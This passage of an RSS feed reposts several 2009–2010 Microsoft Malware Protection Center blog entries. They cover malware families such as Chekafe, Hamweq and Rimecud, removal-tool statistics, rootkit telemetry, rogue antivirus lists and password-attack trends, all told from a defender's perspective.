For the first question, the answer is very simple. The malware checks for the presence of the following processes: BarClientView.exe, Barclient.exe, EWay.exe, NBClient.exe, NxpAuxSvc.exe, clsmn.exe, mzdclient.exe. These processes are related to popular administration software used in Internet cafés in China. If any of these processes are found, obviously, the affected system is most likely from an Internet café.

Now, the second question: why does it check for this? I pondered this for a while until I further investigated the samples that Chekafe downloads. I found most of the downloaded samples were password stealing trojans, including PWS:Win32/Lolyda.AU, PWS:Win32/OnLineGames.FR, and PWS:Win32/OnLineGames.GP. Combined with the fact that it is sending the MAC address information, I realized that this kind of checking may be related to attempts to defeat an account protection mechanism -- MAC address binding. Some popular online games offer the user MAC binding protection - the account can only be logged in from a certain computer (with a unique MAC address). If the affected machine is from an Internet café, most likely the user won't enable the MAC address binding for the account since they may not always use the same machine. Otherwise, Win32/Chekafe.A sends the MAC address information so they can forge the same MAC address to bypass MAC address binding protection.

-Chun Feng</description><link>http://www.secuobs.com/revue/news/189503.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/189503.shtml</guid></item>
<item><title>Win32/Rimecud: MSRT's success story in January 2010</title><description>Secuobs.com : 2010-01-19 21:14:53 - Microsoft Malware Protection Center - If you remember our MSRT related blog from a few days ago (and if not, just scroll down a bit), we informed you that in this month's free removal tool we would be adding Win32/Rimecud to our list of prevalent malware targeted for removal. We even speculated about a possible connection between it and last month's addition, Win32/Hamweq. This led us to believe that, given the high detection rate of Win32/Hamweq, we would have a new leader for January's run of the removal tool. Not to our surprise, this actually happened. Take a look at our 3-day-run top 20 families chart:

Position | Machine Count | Family | Notes
1 | 488,090 | Rimecud | Worm targeting removable drives and instant messaging with backdoor functionality
2 | 274,678 | Hamweq | Worm targeting removable drives, and IRC controlled backdoor
3 | 237,158 | Taterf | Worm targeting network removable drives, and online game PWS
4 | 169,562 | Renos | Rogue antivirus downloader
5 | 124,572 | Alureon | Data stealing malware that changes DNS settings
6 | 116,466 | Conficker | Network worm and malware downloader
7 | 90,586 | Bredolab | Downloader of numerous malware components
8 | 85,777 | Bancos | Password Stealer targeting predominantly Brazilian banks
9 | 85,534 | FakeSpypro | Rogue antivirus
10 | 85,018 | FakeXPA | Rogue antivirus
11 | 68,942 | Yektel | Rogue antivirus component related to FakeXPA
12 | 62,250 | IRCbot | IRC controlled backdoor
13 | 61,602 | Cutwail | Multiple component downloader and spammer
14 | 45,972 | Brontok | Mass emailing worm
15 | 39,820 | Frethog | Online game password stealer related to Taterf
16 | 36,637 | PrivacyCenter | Rogue antivirus
17 | 25,931 | Winwebsec | Rogue antivirus
18 | 24,795 | Parite | File infecting virus
19 | 24,588 | Jeefo | File infecting virus
20 | 24,207 | FakeVimes | Rogue antivirus

According to the table above, first-ranked Win32/Rimecud had almost twice as many removals as second-ranked Win32/Hamweq. Below is a chart of the top ten locales where Rimecud was found and cleaned: [IMAGE]

From the table you can also notice that Taterf and Renos maintain a high profile while Conficker dropped in numbers slightly. Another family that declined in removals this month is Cutwail, from 6th to 13th position. As usual, rogues are also present, with FakeSpypro maintaining the 9th position as in December's report, while FakeXPA dropped in removal numbers from 5th to 10th place. As an important note, we see PrivacyCenter as 16th in the list (it wasn't even a top family last month), ahead of Winwebsec, which had a moderate increase in numbers. Please keep protecting yourself by running Microsoft Security Essentials, or any other reputable antivirus solution.

Marian Radu, MMPC Dublin</description><link>http://www.secuobs.com/revue/news/183211.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/183211.shtml</guid></item>
<item><title>Rimecud and Hamweq - birds of a feather</title><description>Secuobs.com : 2010-01-13 01:46:15 - Microsoft Malware Protection Center - Following the addition of Win32/Hamweq to the MSRT last month, MMPC will continue cleaning PCs in 2010 by adding another prevalent worm, Win32/Rimecud, to this month's removal tool. This is due not only to Win32/Rimecud's high detection numbers, which immediately follow those of Win32/Hamweq, but also to the similarities the two families share with each other. In fact, as part of its payload, Win32/Hamweq may download Win32/Rimecud, contributing to Rimecud's suitability as the next target for MSRT.

Win32/Rimecud is a family of worms that spreads via fixed and removable drives, instant messaging programs, and P2P networks. Similar to Hamweq, it also contains backdoor functionality that allows unauthorized access to affected machines. However, compared to Hamweq, Win32/Rimecud's backdoor supports a more diverse and sophisticated set of commands, giving the remote attacker greater control of the compromised machine. Win32/Rimecud uses a variety of obfuscators to hinder detection. These are written in C, C++, Delphi and Visual Basic and usually have virtual environment detection and anti-emulation tricks to make the malware harder to detect. Other similarities to Win32/Hamweq's behavior include using the Recycle Bin as the target drop folder for copies of itself, injecting code into the explorer.exe process and the capability to spread via removable drives. By looking at the similarities between the two threats we could speculate that they were created by the same author(s). Like they say: "Birds of a feather..." For more technical details about Win32/Rimecud please check our encyclopedia description here.

-Marian Radu</description><link>http://www.secuobs.com/revue/news/180908.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/180908.shtml</guid></item>
<item><title>Some Observations on Rootkits</title><description>Secuobs.com : 2010-01-07 21:51:21 - Microsoft Malware Protection Center - Getting hit by a live rootkit infection is among the more unfortunate fates that can befall an unsuspecting computer user. A rootkit burrows deep into the system, modifying it at a low level in order to hide itself and other malware, and from there fights off attempts at deactivation and removal. While real-time protection can block the rootkit from becoming active to begin with, if the computer is already infected by a rootkit, things get more interesting. Antimalware technologies must use sophisticated techniques to scan for and detect, and finally to remove, a lurking rootkit. In reviewing the telemetry we receive from some of our antirootkit-related features, a few interesting things stand out.

How big is the rootkit problem?
-------------------------------
Of all infections reported from client machines, low-level rootkits represent about 7% of infections. Of course, measuring the prevalence of rootkits is not entirely straightforward: by definition rootkits do everything they can to remain unseen. When we added some additional checks to our default scheduled scan to look for files that are hidden from Windows API calls, some threats that had appeared relatively benign suddenly revealed that they had moved to using a rootkit to try and avoid detection.

Worst of the worst
------------------
In terms of the most prevalent rootkits we see in the wild, the Alureon family wins hands-down, accounting for more than 60% of total rootkit reports. You can learn more about these top families in the Malware Encyclopedia: Alureon, Cutwail, Rustock, Hupigon, Rootkitdrv, Mader, Srizbi, Vanti, Omexo, Haxdoor, Bagle, Xantvi, Sinowal, Protmin, Emold. This list includes threats that tried to run and were blocked by real-time protection. If we look at threats that had files detected as being actively hidden on disk from Windows, we get a somewhat different picture: Rustock, Bagle, Srizbi, Mitglieder, Zbot, Sdbot, Almanahe, Cutwail, NTRootkit, Frethog, Obfuscator, Rootkitdrv, Alureon, AproposMedia, Festi.

Rootkits in their natural habitat
--------------------------------
Rootkits tend to hide their malicious binaries on disk in predetermined locations. Here are the most popular locations we see hidden rootkit binaries living on the hard disk:

Rank | Location | Example
1 | %system%\drivers | c:\windows\system32\drivers
2 | user temp | c:\Users\username\AppData\Local\Temp
3 | %system% | c:\windows\system32
4 | system drive root | c:\
5 | windows temp | c:\windows\temp
6 | %windows% | c:\windows
7 | install folder | location installer was run from

Windows may not show anything unusual in these locations, but a more thorough antirootkit scan can shine a light on the hidden rootkit threats and take appropriate action.

Hidden file types
-----------------
In terms of the type of file being hidden on users' computers, drivers come out on top. Since most rootkits use a kernel-mode driver, this is not surprising.

Type | % of rootkit threats
SYS | 59%
EXE | 40%
DLL | 1%

Kernel-health screening
-----------------------
Currently the most common technique for a rootkit to get active and start hiding on a computer is to modify the Windows OS kernel. When we examine the kernel on computers running our full antimalware client to look for signs of tampering by rootkits, we notice that a disconcerting number of computers are not running with a healthy kernel. Here's a sample of report volume showing computers that have had their Windows kernel altered, across a recent consecutive 10-day period: [IMAGE] That's about 1 in 100 computers. Digging into the results, we see that a lot of software is modifying the Windows kernel for various reasons. While much of this software is not specifically malicious, modifying the kernel can lead to system instability as well as make it easier for rootkits to hide. If the kernel is already hooked by a "legitimate" program, the rootkit can hook at the next level, making it more difficult to trace the hook chain to the malicious code.

An unspoiled landscape
----------------------
As Joe pointed out in his recent post on the 64-bit malware landscape, running 64-bit Windows offers even more protection for customers. For the rootkit space, the difference between 64-bit and 32-bit is even more pronounced. In fact, it's likely that an even smaller percentage of the reported rootkit threats from 64-bit computers were actually able to successfully become active and hide anything. Enforced driver signing and features such as Kernel Patch Protection make 64-bit Windows a much more hostile environment for rootkits.

Parting thoughts
----------------
We expect that malware authors will continue to seek ways to fly under the radar, just as we will continue to evolve our protection technologies to stay one step ahead of the bad guys. Regardless, here are a couple of tips to avoid getting hit by a rootkit:

- Keep real-time protection enabled: while running up-to-date antimalware software is essential, it does little good if you turn off the real-time protection feature. If you lower your defenses and a rootkit does get through, finding and removing it can be a tricky endeavor. Keep your defenses up and you're much less likely to have headaches down the road.
- Run 64-bit Windows: for the time being, it appears that currently, users running 64-bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.

Regards,
-Randy Treit</description><link>http://www.secuobs.com/revue/news/179315.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/179315.shtml</guid></item>
<item><title>Microsoft privacy portal a target of rogue security software</title><description>Secuobs.com : 2009-12-19 03:22:08 - Microsoft Malware Protection Center - Earlier in 2009, the Microsoft privacy homepage became the target of rogue security software developers looking to make a fast buck. The developers of the rogue security application known as "Privacy Center" even went so far as to include a link to Microsoft to trick users into thinking the rogue is a Microsoft product. Trojan:Win32/PrivacyCenter is a family of programs that claims to scan for malware and displays fake warnings of "malicious programs and viruses". They then inform the user that they need to pay money to register the software in order to remove these non-existent threats. We have received reports that this trojan has been distributed via poisoned search results, where users are redirected to sites that display fake scanners. These pages mistakenly report that the user's system is infected in order to convince users to download Trojan:Win32/PrivacyCenter. We have also received reports that this trojan has been distributed masquerading as a fake video codec. The pages and files utilized in this form of attack are highly variable, and change according to the user's location, browser and operating system. Below is a screenshot of the rogue program: [IMAGE]

Reports of rogue security programs have been more prevalent as of late. These are programs that generate misleading alerts and false detections in order to convince users to purchase illegitimate security software. Some of these programs may display product names or logos in an apparent and unlawful attempt to impersonate Microsoft products. Use Microsoft Security Essentials, Microsoft Windows Defender, the Windows Live safety scanner (http://onecare.live.com/site/en-us/default.htm), or another up-to-date scanning and removal tool to detect and remove these threats and other unwanted software from your computer. For more information on Microsoft security products, see http://www.microsoft.com/protect/products/computer/default.mspx

-- Regards, Patrick Nolan</description><link>http://www.secuobs.com/revue/news/174182.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/174182.shtml</guid></item>
<item><title>Surveying the Hamweq-age - Threat Reports for MSRT December</title><description>Secuobs.com : 2009-12-17 07:03:06 - Microsoft Malware Protection Center - In the week since its release on December 8, MSRT has cleaned over 2.5 million machines of malware. The new family for December was Win32/Hamweq, an IRC controlled backdoor which spreads via removable drives. Hamweq was removed from 638,491 machines, making it the most prevalent family for the month, with around double the number of removals of Win32/Taterf, the next most prevalent family. Taterf, which is perennially one of the highest reported families by MSRT, also had more than twice the number of removals of the third most prevalent family. Listed below are some of the families with high numbers of removals for this month.

Machines Cleaned | Family Name | Notes
638491 | Hamweq | Worm targeting removable drives, and IRC controlled backdoor
319998 | Taterf | Worm targeting network removable drives, and online game PWS
156549 | Conficker | Network worm and malware downloader
104577 | Renos | Rogue antivirus downloader
100050 | FakeXPA | Rogue antivirus
98725 | Cutwail | Multiple component downloader and spammer
90472 | Alureon | Data stealing malware that changes DNS settings
72231 | Frethog | Online game password stealer related to Taterf
62394 | Bancos | Password Stealer targeting predominantly Brazilian banks
60109 | FakeSpypro | Rogue antivirus
57645 | Yektel | Rogue antivirus component related to FakeXPA
54908 | Brontok | Mass emailing worm
51150 | Koobface | Multiple component worm targeting social networking sites
43035 | Bredolab | Downloader of numerous malware components
34029 | Parite | File infecting virus
31441 | IRCbot | IRC controlled backdoor
30400 | Jeefo | File infecting virus
27964 | Virut | File infecting virus with IRC controlled backdoor
24361 | Zlob | Multiple component malware family that downloads arbitrary files
24057 | RJump | Worm targeting removable drives
23950 | Banker | Password Stealer targeting predominantly Brazilian banks
23377 | Banload | Downloader of bank password stealers
22462 | FakeVimes | Rogue antivirus
20564 | Rustock | Rootkit enabled backdoor used to assist with sending of spam
19294 | Vundo | Adware downloader
15814 | Winwebsec | Rogue antivirus

Hamweq was prevalent across a wide range of locales worldwide: of the 199 locales where MSRT reported cleaning at least one system, 185 of them reported cleaning a Hamweq infection. Wherever a locale reported high numbers of machines cleaned of malware, reports of Hamweq were also generally high. The main exception to this was Chinese speaking countries, where reports were dominated by online game password stealing malware such as Taterf, Frethog, and Lolyda.

Locale | Machines cleaned (All Malware)
United States | 644025
Brazil | 171414
Korea | 156985
Spain | 167575
France | 79493
Mexico | 66904
United Kingdom | 63557
Taiwan | 62616
Poland | 61817
Turkey | 57972
China | 50730
Russia | 47467
Italy | 45362
Portugal | 45210
Japan | 43274
Germany | 39498
Australia | 19124
Netherlands | 17830
Chile | 13710
Canada | 12678

Locale | Machines Cleaned (Hamweq)
United States | 155142
Spain | 94888
Brazil | 41692
Mexico | 37771
Korea | 35874
Poland | 25985
Portugal | 23323
France | 18607
Russia | 15505
United Kingdom | 13414
Italy | 9520
Chile | 8104
Turkey | 6818
South Africa | 6554
Australia | 5979
Germany | 5853
Colombia | 5707
Japan | 5351
Israel | 4326
Argentina | 3622

December's MSRT release also saw a significant drop in the number of reports for Win32/FakeScanti, a rogue antivirus that was added to MSRT in October. At the corresponding period in October, FakeScanti was the 12th most prevalent family, with removals from 56,700 machines. Shortly afterwards, FakeScanti's authors stopped modifying the rogue to avoid detection by antivirus products, and as a result, we have not needed to add a signature for FakeScanti since October 26. In November, FakeScanti was the 23rd most prevalent family with 20,222 removals, whilst by December it had dropped to 49th with 1595 removals. While FakeScanti's authors may have moved their focus to developing other malware, the rogue can still be downloaded, and we have since seen other malware that installs FakeScanti on to affected systems. Similarly, Win32/FakeSecSen, which was the very first rogue we added to MSRT in November 2008, can still be downloaded even though it has not been updated since later that month, and is still being cleaned in small numbers by MSRT over a year later. This month FakeSecSen was the 54th most prevalent family with 1031 removals. The fact that these rogues' distributors find it worthwhile to continue to host malware that would be detected by most antivirus products shows that unprotected systems are still a rich target for those who would use them for profit, or for other nefarious activities. As usual, we recommend protecting yourself by running Microsoft Security Essentials, or any other reputable antivirus solution.

David Wood, MMPC Melbourne</description><link>http://www.secuobs.com/revue/news/173269.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/173269.shtml</guid></item>
<item><title>If at first you don't succeed...</title><description>Secuobs.com : 2009-12-11 01:58:10 - Microsoft Malware Protection Center - ...it might be because you weren't meant to. Last year, the EOF virus-writing group decided to release a virus zine with the help of DoomRiderz and rRlf. Well, here is how that turned out: rRlf backed out of the project at the last minute and then folded, and DoomRiderz folded shortly after the zine was released. The zine itself contained some buggy contributions, and the majority of them were extremely primitive. The only new techniques came from the oldest of the virus writers. One of those techniques was an unusual use of a CPU instruction, and the others were file-format tricks. They were certainly techniques that we weren't expecting to see, but nothing that our engines couldn't handle already. There were some other interesting samples, too, though the reasons for their being interesting are varied. It was mostly because we identified numerous bugs in each sample (see, for example, Win32/Harumf). One of them was interesting for the extent to which it attempted to be anti-heuristic (Win Zekneol). One of them was interesting because it was a collection of old routines (Win Satevis). None of them were a problem for our engines, though. It's been more than a year since I started describing these samples in the Virus Bulletin journal. I've almost finished with the set, and perhaps just in time to start a new one: it seems that the EOF is at it again, only this time with a different group. VirusTech is a Russian group that announced the joint venture, but then went completely silent on the subject. Who knows if they will release anything this year?

As far as the proof-of-concept authors saving the virus scene, that didn't happen, either. The virus writer known as herm1t did his thing with the file format tricks, but the virus code is still easy to reach and easy to scan. Of course, this wasn't the purpose of the demonstration (contrast that with his earlier Linux/Crimea virus family, whose code was not easy to reach, and which clearly was the purpose of the demonstration). We had two variants of a virus that overwrites the .note.ABI-tag section, four variants of a virus that overwrites (in different ways) the .hash section, a virus that adjusts the segment alignment, and a virus that overwrites the Procedure Linkage Table. It seems that he has run out of things to do with the file, at least for now. These viruses are especially interesting because they are exploiting aspects of a file format that has no equivalent in Windows. It also shows that Linux and other Unix-based platforms (you know which ones I mean) are not immune to viruses.

After almost an entire year of silence, the virus writer known as roy g biv returned to the scene with some text files. His two new techniques, "Subtle SEH" and "Heaven's Gate", are certainly new and different, but also a coding dead-end. While the subtle registering of SEH might fool a human, these days it's all about the emulator, and the emulator is not fooled. Heaven's Gate is even less of a problem, in a sense - it is using a gate to jump from a 32-bit environment into a 64-bit environment, assuming that the processor and operating system support it. I suppose that eventually we will see a virus that uses the technique, but if our emulator decides to not support that, then it simply won't run. This situation is much like the use of SSE4.2 instructions that I described in The Power Of SSE. Oh, I mustn't forget to mention the virus for ODBGScript that is apparently by him, but I'm sure that the question on everyone's lips is - is it really him? Okay, maybe not everyone's lips. At least some people will be asking "Do I care?" Most recently there was the release of a Hiew plugin virus, for Hiew. It infects the file that Hiew is examining.

SPTH is also back after his retro detour of DOS virus material, and this time it's polymorphic fun with linear algebra. Of course, it doesn't matter how variable the polymorphic part is, if the rest of it is constant, and that's what we have here: a huge, enormous, gigantic, colossal constant decryptor, followed by a huge, enormous, gigantic, colossal "polymorphic" representation of the body. The only reason that it's polymorphic is because it's all text. It's a script virus. Keeping it simple is just one step away from retiring again. We're happy about that development.

One other development is from one of the newer members, "Dark Prophet". He has apparently written a polymorphic, anti-heuristic, and anti-emulating virus that... well, I'll get to it eventually, but a quick glance has already shown me one serious bug. I've even received a request to describe it. How nice. I hope that it's because they think that I'll do a good job with it. So that's the news in brief.

- Peter Ferrie (with apologies to Roger Hargreaves and his "Mr Greedy" story)</description><link>http://www.secuobs.com/revue/news/170790.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/170790.shtml</guid></item>
<item><title>MSRT slices the Hamweq for Christmas</title><description>Secuobs.com : 2009-12-08 22:52:47 - Microsoft Malware Protection Center - This month, Worm:Win32/Hamweq has been added to the Malicious Software Removal Tool (MSRT) in time for the holidays. Hamweq makes it on to MSRT's "naughty" list as an IRC-controlled backdoor that spreads via removable drives. It has multiple means of hiding its presence: it installs itself into a hidden directory which it disguises as a recycle bin, and, once run, it injects various code sections, and separately injects each of the encrypted strings it uses, into the explorer.exe process. This means it will not be shown separately on any list of running processes, and may also give it network access through any firewall that might be installed.

Hamweq periodically checks whether a removable drive has been attached, and if so, will copy itself to that drive, again using a directory that it disguises as a recycle bin. It also creates an autorun.inf file on the drive, containing an option to "Open folder to view files". This means that when the drive is subsequently attached to another system, the autoplay dialog will display two options that have this description. One of these will display the drive in Windows Explorer, whilst the other will run the malware. If the malware is launched from a removable drive, it also opens Windows Explorer, so users may not be able to spot the difference between the two options. [IMAGE]

The worm connects to an IRC server; this allows the backdoor's controllers to give the gift of more malware, as the server may order Hamweq to download and execute whatever files they see fit to install on the machine. Some variants of Hamweq may also be ordered to participate in Distributed Denial of Service attacks. Microsoft's latest Security Intelligence Report lists Hamweq as the second most prevalent distinct worm family reported by Forefront, our enterprise antivirus solution. Worms that spread via network shares or via removable drives tend to have large numbers of reports in corporate environments, as these environments are usually highly networked, and because removable drives such as USB memory sticks are used often. Win32/Taterf, in spite of its payload being a password stealer for a number of different, predominantly Chinese-language-based online role playing games, is another worm that is particularly prevalent in corporate environments worldwide (third most reported worm family by Forefront), regardless of the region, and the fact that most corporations would not have these games installed on their systems. Taterf, which is consistently one of the highest reported threats by MSRT, was found in high numbers in diverse regions such as Brazil, France, Russia, and South Africa.

You can reduce the effectiveness of these types of worms by ensuring that autorun content is not displayed in the autoplay dialog when removable or network drives are attached. For Windows 7, this is the default behavior (see http://blogs.technet.com/srd/archive/2009/04/28/autorun-changes-in-windows-7.aspx). If you have an earlier version of Windows that is not already configured in this way, you can follow the instructions at http://support.microsoft.com/kb/971029. Alternatively, for Windows Vista or later, you can disable autoplay completely, or for particular types of media, via the "Hardware and Sound" section of the Control Panel.

David, MMPC Melbourne</description><link>http://www.secuobs.com/revue/news/169832.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/169832.shtml</guid></item>
<item><title>National CyberSecurity Awareness Month</title><description>Secuobs.com : 2009-12-01 04:22:27 - Microsoft Malware Protection Center - Today marks the beginning of National CyberSecurity Awareness Month here in the United States. I would like to take this opportunity to acknowledge all the security professionals around the world who work tirelessly to make cyberspace a safer place for all our online pastimes. You know who you are. It's nice to know we all work for the same team. Jimmy Kuo. PS: I'm glad to see www.staysafeonline.info still going strong.</description><link>http://www.secuobs.com/revue/news/167019.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/167019.shtml</guid></item>
<item><title>Fake Security Software All Up</title><description>Secuobs.com : 2009-11-30 22:16:02 - Microsoft Malware Protection Center - In a recent blog posted on 18th November we talked about the significant threat that AV rogues had posed for our users this year. Besides the prevalent rogues covered by the MSRT, the following is a longer list of AV rogues detected by Microsoft AV products such as Microsoft Security Essentials, Forefront Client Security, etc.: FakeXPA, FakePowav, MalwareBurn, UnSpyPc, DriveCleaner, DoctorTrojan, Winfixer, FakeScanti, Cleanator, MalwareCrush, PrivacyChampion, SystemLiveProtect, Yektel, FakeSmoke, Spyguarder, AntivirusGold, SystemGuard2009, WorldAntiSpy, SpywareSecure, IEDefender, MalWarrior, Malwareprotector, SpywareSoftStop, AntiSpyZone, Antivirus2008, PrivacyCenter, SpyLocked, Trojanguarder, MyBetterPC, NeoSpace, Winwebsec, FakeRemoc, SpywareStormer, SecurityiGuard, DoctorCleaner, UniGray, FakeSecSen, VirusRemover, Privacywarrior, PrivacyProtector, SpyBlast, FakeFreeAV, FakeRean, Antivirus2009, AntiSpywareDeluxe, Searchanddestroy, AlfaCleaner, WebSpyShield, InternetAntivirus, Antivirusxp, ErrorGuard, SpyCrush, Fakeav, Spyaway, WinSpywareProtect, Fakerednefed, Antispyware2008, EZCatch, EvidenceEraser, Vaccine2008, FakeSpypro, FakeCog, AntiVirGear, VaccineProgram, TrustCleaner, SearchSpy, AntiSpywareExpert, VirusRanger, SpyDawn, UltimateFixer, WinHound, Spyshield, SpySheriff, Antispycheck, SpywareIsolator, SpyFalcon, PrivacyRedeemer, VirusConst, FakeVimes, PCSave, PSGuard, SpywareStrike, Nothingvirus, AVClean, FakeIA, AntispyStorm, Antivirustrojan, XDef, AntiSpywareSoldier, AdvancedCleaner, FakePccleaner, SpywareQuake, WareOut, Kazaap, FakeSpyguard, SpyHeal, VirusBurst, VirusRescue, TitanShield, Fakeinit, AntiVirusPro, CodeClean, Spybouncer, MalwareWar, SpyAxe, Awola, MyNetProtector, FakeWSC, DoctorAntivirus, UltimateDefender, VirusHeat, Easyspywarecleaner, SystemDefender, AdsAlert. You may recognize some of the relatively recent rogues from this list such as FakeXPA, FakeSecSen and FakeRean. Some others, such as Winfixer and SpySheriff, have origins that actually go back to more than four years ago. On page 100 of our Security Intelligence Report volume 7, we observed that rogues remained a significant threat even though they trended down to 13.4 million infected computers in 1H09 from 16.8 million in 2H08 (Internet Explorer 8 SmartScreen Filter, a browser-based security feature, contributed to part of the decline). As we have done in the past, we again encourage our readers to run a complete, up to date AV product such as Microsoft Security Essentials to protect their computers from these rogues, especially if located in English speaking countries - the regions where these rogues appear most active (as highlighted in the SIR). MSRT is a baseline tool we provide for the ecosystem to remove prevalent threats such as high profile rogues. With Security Essentials, on the other hand, you get the benefit of the complete AV signature set from the MMPC and you get the essential protection features an AV solution needs: real time, kernel mode detection, scheduled scan, complicated cleaning functionalities to address the emergent threats, etc. Still, awareness of the threat event is also important. Take a look at some of the write-ups of these threats, get familiar with some of the enticing rogue skins used (like that displayed in the Win32/InternetAntivirus screenshot below) and tell your friends and families to be alert to the tricks used to socially engineer victims into opening their wallets for these 'useless at best' rogue AVs. Scott Wu - MMPC</description><link>http://www.secuobs.com/revue/news/166925.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166925.shtml</guid></item>
<item><title>Do's and don'ts for p@$$w0rd</title><description>Secuobs.com : 2009-11-27 15:05:07 - Microsoft Malware Protection Center - Almost a year ago, we started a project designed to monitor incoming attacks against a normal user on a day-to-day basis. We presented you with details about the geographical area from where the attacks originated and what services were targeted, and we gave you just a hint about FTP dictionary-based attacks. Now we're going into a bit more detail about the passwords, having so far gathered hundreds of user names and tens of thousands of passwords that have been used in automated attacks in the last couple of months. Most of them were collected by our "fake" FTP server, which is designed to emulate a small part of the FTP protocol and log the information so that it's easy to process. As you can see below in the statistics, the length of the passwords is quite interesting, mainly because the average length according to our data is 8 characters and that's quite close to the length of the passwords that many people use for their Internet accounts.
Statistics about user names and passwords: Longest user name: 15 chars. Longest password: 29 chars. Average user name length: 6 chars. Average password length: 8 chars.
Here is a top 10 list with the most common user names used in automated attacks:
User name | Count
Administrator | 136971
Administrateur | 107670
admin | 8043
andrew | 5570
dave | 4569
steve | 4569
tsinternetuser | 4566
tsinternetusers | 4566
paul | 4276
adam | 3287
And a similar list for passwords:
Password | Count
password | 1188
123456 | 1137
comment | 248
changeme | 172
F*kyou (edited) | 170
abc123 | 155
peter | 154
Michael | 152
andrew | 151
matthew | 151
Trivia: one attacker tried more than 400,000 user name and password combinations. Most of the probing is done from compromised systems that are connected to a password-protected IRC channel and are waiting for commands. As you can see in the image below, one such command is to scan and identify other vulnerable hosts. [Image: Bot command] We just want to make users aware of the fact that passwords of around 8-10 characters (the average length of passwords that are normally used for Internet accounts) are used in attacks. Even a long password (10 to 15, or even 20 characters) isn't good enough if it's dictionary-based. As seen in the table above, there are passwords in dictionaries that are even using special characters (for example "comment"), not only numbers and letters. You should take good care of what user name and password you're choosing. If your account has no limit on the number of login attempts, then knowing the user name is like having half of the job done. Especially for the user names from the top 10 (and mainly for the Administrator/Administrateur accounts), the passwords shouldn't be picked lightly. Usually we choose easy to type and/or easy to remember passwords, but please don't forget that those passwords (for the moment) are the most commonly used for authentication on the Internet, so they need to be strong. The three basic things to remember when creating a strong password are the following: 1. Use a combination of letters, numbers and special characters. Also, remember that some dictionaries used in attacks have a "l33t" mode, which allows common letter/number-to-special-character substitutions (like changing a to @, i to 1, o to 0 and s to $; for example, password becomes p@$$w0rd). Therefore, mix them in different ways so that they are not predictable. 2. Use a combination of upper and lower case letters. 3. Make it lengthy. A longer password does not necessarily mean it is strong but it can help in some cases. To check if you have a strong password, you can use Microsoft's password checker: http://www.microsoft.com/protect/fraud/passwords/checker.aspx (Password Checker). Having a super strong password is not enough. From time to time, you need to change it, especially when you feel that your account has been compromised. We also advise you to have several sets of passwords that differ in every account, so in case one has been compromised not all your accounts will be affected. For additional information regarding passwords you can visit the following links: Creating passwords - http://www.microsoft.com/protect/fraud/passwords/create.aspx; Maintaining passwords - http://www.microsoft.com/protect/fraud/passwords/secret.aspx. And by the way: don't forget your password! Francis Allan Tan Seng and Andrei Saygo</description><link>http://www.secuobs.com/revue/news/165761.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/165761.shtml</guid></item>
<item><title>A Peek at MSRT November Threat Reports</title><description>Secuobs.com : 2009-11-19 01:07:20 - Microsoft Malware Protection Center - By continuing to include new variants of the existing threat families, the MSRT has removed malware from more than 1.5 million machines three days after its release on 10 November. This month we've also added Win32/FakeVimes and Win32/PrivacyCenter to the MSRT detection and have removed these new rogues from more than 110,000 machines. A lot of the top threat families are no strangers if you refer to our previous blog posts, or our recently published Security Intelligence Report. Out of these prevalent threat families worldwide: 8 are password stealers collecting online game credentials, online banking passwords or other user identities of users' online accounts; 8 of them are fake security products or trojan downloaders for rogues. The MSRT now covers the following most high profile rogues: Win32/FakeVimes, Win32/PrivacyCenter, Win32/FakeScanti, Win32/FakeSecsen, Win32/FakeXPA, Win32/Yektel, Win32/Winwebsec, Win32/InternetAntivirus, Win32/FakeSpypro, Win32/FakeRean; 5 are trojan downloaders or droppers, a threat category which is often an infection vector to deliver drive-by malware to the victims' computers; Win32/Koobface is still in the top 25 though it has dropped out of the top 10. Online Social Network sites such as Facebook continue to boost their security hardening to protect their customers and we welcome their actions; Win32/Zlob has dropped out of the list in recent months after being extremely prevalent for almost three years. We observed that the Zlob authors appeared to move somewhere else in our Oct 2008 blog and Jan 2009 blog.
Family | Computers Cleaned | Most Significant Category | Notes
Taterf | 239,870 | Worms | online game PWS
Alureon | 141,358 | Miscellaneous Trojans | data stealing trojans modifying DNS settings
Bancos | 138,803 | Password Stealers &amp; Monitoring Tools | Brazil online banking PWS
Renos | 115,970 | Trojan Downloaders &amp; Droppers | AV rogues downloaders
FakeXPA | 96,466 | Miscellaneous Trojans | AV rogues
Yektel | 90,982 | Trojan Downloaders &amp; Droppers | AV rogues
FakeVimes | 78,749 | Miscellaneous Trojans | AV rogues
Cutwail | 78,161 | Trojan Downloaders &amp; Droppers | Spambot
FakeSpypro | 57,534 | Miscellaneous Trojans | AV rogues
Frethog | 54,764 | Password Stealers &amp; Monitoring Tools | online game PWS
Bredolab | 48,323 | Trojan Downloaders &amp; Droppers | mass downloader
IRCbot | 40,259 | Backdoors | old spambot with traditional C&amp;C
Vundo | 38,481 | Miscellaneous Trojans | adware downloaders
Koobface | 36,300 | Worms | web 2.0 worm targeting social networking sites
Brontok | 35,531 | Worms | mass-mailing e-mail worms
PrivacyCenter | 34,726 | Miscellaneous Trojans | AV rogues
Banker | 28,293 | Password Stealers &amp; Monitoring Tools | Brazil online banking PWS
Banload | 25,166 | Password Stealers &amp; Monitoring Tools | Brazil online banking PWS
Jeefo | 23,887 | Viruses | parasitic file-infector virus
Virut | 22,549 | Viruses | viruses evolved with backdoor behaviors
FakeRean | 20,603 | Miscellaneous Trojans | AV rogues
FakeScanti | 20,222 | Miscellaneous Trojans | AV rogues
Parite | 20,076 | Viruses | prevalent viruses in Asia
Lolyda | 19,210 | Password Stealers &amp; Monitoring Tools | online game PWS
RJump | 18,452 | Worms | worm targeting removable devices
